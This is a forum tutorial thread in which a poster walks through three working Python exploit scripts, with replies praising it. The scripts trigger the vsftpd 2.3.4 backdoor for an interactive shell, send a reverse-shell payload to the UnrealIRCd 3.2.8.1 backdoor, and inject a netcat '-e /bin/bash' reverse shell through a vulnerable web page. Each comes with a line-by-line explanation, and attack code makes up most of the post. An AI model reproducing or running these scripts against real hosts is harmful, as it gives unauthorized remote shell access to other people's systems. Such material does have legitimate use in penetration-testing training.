Exploit with Python

Eagleweb

Senior Member
8 May 2021
2,120
1,151
localhost/e8

Hello again, with a long topic.
Today I will try to explain how to write a network exploit in Python.
I will use the three vulnerabilities that show up most often in examples of this kind.
Let's get into the subject.
To write a network-based exploit we first need to know network programming.
In Python, network programming is done with the socket module.

The socket constants and calls we will need:
Python:
socket.AF_INET: address family for IPv4.
socket.AF_INET6: address family for IPv6.
socket.SOCK_STREAM: TCP socket.
socket.SOCK_DGRAM: UDP socket.

socket.connect((h,p)): connects to host h on port p (client side).
socket.bind((h,p)): binds the socket to address h and port p so it can listen there (server side).
socket.listen(n): starts listening; n is the backlog, the number of pending connections the OS will queue.
socket.accept(): accepts an incoming connection and returns a (connection, address) pair.
socket.send(data): sends data to the connected peer.
socket.recv(n): reads up to n bytes of the peer's reply.
With these alone a basic connection can be set up and spoken over.
They are sufficient here, because the exploits we are going to write stay at a very basic level.

Vsftpd 2.3.4
There are two main reasons why I chose the vsftpd vulnerability:
1- It is the most common example, because the exploitation happens on its own: there is no payload to build.
2- No handler is needed for the connection that will be made.
The way to exploit it is to answer the server's username prompt with a name that ends in ":)"; that string is the trigger, and the backdoored server then opens a shell on port 6200. This is not a bug in vsftpd's protocol handling but a backdoor that was planted in a tampered copy of the 2.3.4 source archive, so only builds from that archive answer the trigger, which is why the script checks the banner before doing anything else.

The code I wrote for this process is as follows:
Python:
01| from socket import *
02| import sys
03|
04| aux = socket(AF_INET,SOCK_STREAM)       # TCP over IPv4
05| host = sys.argv[1]
06| port = int(sys.argv[2])
07|
08|
09| aux.connect((host,port))
10| head = aux.recv(1024).strip()           # FTP banner, e.g. "220 (vsFTPd 2.3.4)"
11| if b"(vsFTPd 2.3.4)" in head:
12|     aux.send(b"USER something:)\n")     # ":)" at the end of the username is the backdoor trigger
13|     aux.recv(1024)
14|     aux.send(b"PASS againsomething\n")
15|     aux.close()
16|     print("My man! This port has got a vuln.\n")
17| else:
18|     print("Sorry dude :( This is a normal port\n")
19|     sys.exit()
20|
21|
22| exp = socket(AF_INET,SOCK_STREAM)       # second socket for the shell the backdoor opened
23|
24| exp.connect((host,6200))
25| while True:
26|     com = input("#")
27|     if com == "exit":
28|         exp.close()
29|         sys.exit()
30|     exp.send((com + "\n").encode())
31|     print(exp.recv(1024).decode(errors="replace"))   # at most 1024 bytes; blocks if the command prints nothing

Lines 1 and 2 import the socket and sys modules the script needs.
Line 4 creates the socket that will carry the connection: TCP over IPv4, kept in a variable called aux for brevity.
Lines 5 and 6 take the target host and port from the command line.
Line 9 connects to that IP address and port; from here on everything done through aux travels over this connection.
Lines 10, 11 and 17 read the banner and check whether the port is really running vsFTPd 2.3.4; if not, the script says so and exits.
Line 12 is the first step of the exploitation: the USER command is sent with the ":)" trigger on the end.
Line 13 reads the server's reply so the exchange stays in step.
Lines 14 and 15 add the finishing touch, the PASS command, and close the connection.
Line 22 creates a new socket exactly as on line 4, under a new name, so the shell part of the script is easier to read.
Line 24 connects to port 6200, where the backdoor is now listening.
Line 25 opens a while loop that keeps going until it is exited from the inside.
Line 26 asks the attacker for the command to send.
Lines 27 to 29 give a quick way out: typing exit closes the connection and ends the script.
Line 30 sends the typed command to the other side.

Line 31 prints the reply, and control returns to line 26. Two things to keep in mind: recv(1024) returns at most 1024 bytes, so long output is cut off, and it blocks until something arrives, so a command that prints nothing (cd, for example) makes the script appear to hang.

What the attacker sees:
(screenshot: suciw4l.png)

What is happening on the network:
(screenshot: srkckgq.png)

Unreal IRC
I preferred this vulnerability because it is easy, and because it is one where we can use a handler for the exploitation.
To exploit it, once the connection is up and the packets the server sends us on connect have been read, we send "AB;" followed by the command we want to run. "AB;" is the trigger: the backdoored ircd (the build from the tampered 3.2.8.1 source archive) passes whatever follows it to the system shell.

I wrote the following script for this process:

Python:
01| from socket import *
02| import sys
03|
04| thost, tport = sys.argv[1], int(sys.argv[2])
05| lhost = '"'+ sys.argv[3] +'"'            # quoted so it becomes a string literal inside the python -c payload
06|
07|
08| fir = socket(AF_INET,SOCK_STREAM)        # connection used to deliver the payload
09|
10| fir.connect((thost,tport))
11| payload = """AB;python -c 'import socket,subprocess,os;pay=socket.socket(socket.AF_INET,socket.SOCK_STREAM);pay.connect((""" + lhost + """,4444));os.dup2(pay.fileno(),0); os.dup2(pay.fileno(),1); os.dup2(pay.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
12| fir.send(payload.encode())
13| fir.recv(1024)
14|
15|
16| han = socket(AF_INET,SOCK_STREAM)        # handler for the reverse shell
17|
18| han.bind(("",4444))                      # payload already went out on line 12: a small race, bind before sending to be safe
19| han.listen(1)
20| fir.close()
21| cl, addr = han.accept()                  # accept() returns (connection, address)
22| print(cl.recv(1024).decode(errors="replace"))
23| while True:
24|     sh = cl.recv(1024).decode(errors="replace")   # the remote shell's prompt, reused as ours
25|     send = input(sh)
26|     if send == "exit":
27|         han.close()
28|         sys.exit()
29|     cl.send((send + "\n").encode())
30|     data = cl.recv(1024).decode(errors="replace")
31|     print(data)

The other lines do the same as in the previous exploit.
Line 11 defines the payload that is sent once the connection is up. It is a one-line Python program whose job is to connect back to the attacker on port 4444 and attach /bin/sh to that socket; the "AB;" trigger is at the front of it. lhost was wrapped in double quotes on line 5 so that it lands inside the payload as a string literal.
Line 12 sends the payload.
Line 13 reads one reply packet so the server is not left hanging, but nothing is shown to the attacker.
Line 18 opens the listening port that will catch the shell connection coming from the server. Since the payload has already gone out on line 12 this is a small race; the target needs a moment to start python, so it normally works, but binding and listening before sending is the safer order.
Line 19 sets the backlog: one queued connection is enough.
Line 20 closes the connection that delivered the payload.
Line 21 accepts the incoming shell. accept() returns a (connection, address) pair; the connection is kept in cl and is what the recv and send calls below use.
Line 23 starts the while loop once the connection is in place.

The rest does the same as in the previous exploit.


What the attacker sees:
(screenshot: e5ald9o.png)

What Wireshark sees:
(screenshot: r0gtbwy.png)


Command Injection
There are also two reasons why I chose this vulnerability:
1- It is HTTP-based, and the exploit is written accordingly.
2- There are a lot of HTTP vulnerabilities, and since they all look alike I lazily picked this one.
The vulnerable page asks you for some input, runs it on the command line and shows you the output. If you append "|" followed by your own command, the shell runs that command as well, whether or not the first one succeeds.

To do this, I wrote the following script:
Python:
01| from socket import *
02| import sys
03|
04| con = socket(AF_INET,SOCK_STREAM)        # connection to the web server
05| han = socket(AF_INET,SOCK_STREAM)        # handler for the reverse shell
06| rhost, url, lhost = sys.argv[1], sys.argv[2], sys.argv[3]
07|
08| con.connect((rhost,80))
09| payload = "GET "+ url +"|%20nc%20"+ lhost +"%204444%20-e%20/bin/bash HTTP/1.1\r\nHost: "+ rhost +"\r\n\r\n"   # %20 = URL-encoded space; CRLF line endings as HTTP requires
10| han.bind(("",4444))                      # listener is up before the request is sent
11| han.listen(1)
12| con.send(payload.encode())
13|
14| cl, addr = han.accept()                  # accept() returns (connection, address)
15| while True:
16|     send = input("==>")
17|     cl.send((send + "\n").encode())
18|     data = cl.recv(1024).decode(errors="replace")
19|     print(data)

The first part does the same as the other exploits.
Line 9 builds the HTTP request to the web port. The request carries the injected command (|nc [IP address] [port] -e /bin/bash); the %20 sequences are URL-encoded spaces, since a raw space would end the request line early. Note that -e only exists in the traditional netcat; the OpenBSD netcat shipped on many modern systems does not have it.
Lines 10 to 12 start the listener and then send the request containing the injection.
The rest is the same as in the other exploits (I hope you have noticed).

The attacker looking at the screen:
(screenshot: 38dh10x.png)

Wireshark, sipping its coffee:
(screenshot: fp6zlv8.png)

Source:Python ile Exploit Yazmak
 
30 Nov 2021
122
56
root@wortex

(quotes Eagleweb's post above in full)
Thanks king, it was useful.
 

CasPeRAB

Expert Member
7 Nov 2021
1,144
461
TR❤AZ

(quotes Eagleweb's post above in full)
Nice topic bro, health to your hands.
 